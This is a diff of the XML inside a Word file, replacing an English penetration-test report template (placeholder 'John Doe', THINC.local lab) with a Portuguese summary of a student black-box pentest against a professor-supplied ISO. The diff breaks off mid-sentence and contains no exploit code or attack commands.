-        <w:t xml:space="preserve">John Doe was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>similar to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> those of a hacker and attempt to infiltrate Offensive Security’s internal lab systems – the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-        </w:rPr>
-        <w:t>THINC.local</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> domain. John</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>exploited</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and access granted. These systems as well as a brief description on how access was obtained are listed below:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PargrafodaLista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lab Trophy 1 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PargrafodaLista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lab Trophy 2 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PargrafodaLista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lab Trophy 3 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PargrafodaLista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exam Trophy 1 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PargrafodaLista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exam Trophy 2 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:t>Resumo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:u w:color="000000"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
@@ -1865,6 +1796,617 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Ary, Lucas e Adriano</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> foram designados para realizar um teste externo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Back Box)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> de penetração em uma ISO fornecida pelo professor. O </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>teste</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> envolve ataques direcionados </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>uma máquina virtual</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">. O foco deste teste era realizar ataques semelhantes aos de hackers e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">tentar realizar invasões no sistema </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>ISO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>. O objetivo geral dos estudantes era avaliar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>, i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>dentificar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>e explorar falhas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> e vulnerablilidades</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> relatar os resultados </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>obtidos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:cr/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:cr/>
+        <w:t xml:space="preserve">Durante a realização </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>do</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Pentest</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> externa, foram identificadas várias vulnerabilidades preocupantes na ISO fornecida pelo professor. Durante os ataques, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Ary, Lucas e Adriano</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>identificaram diversas vulnerabilidades</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
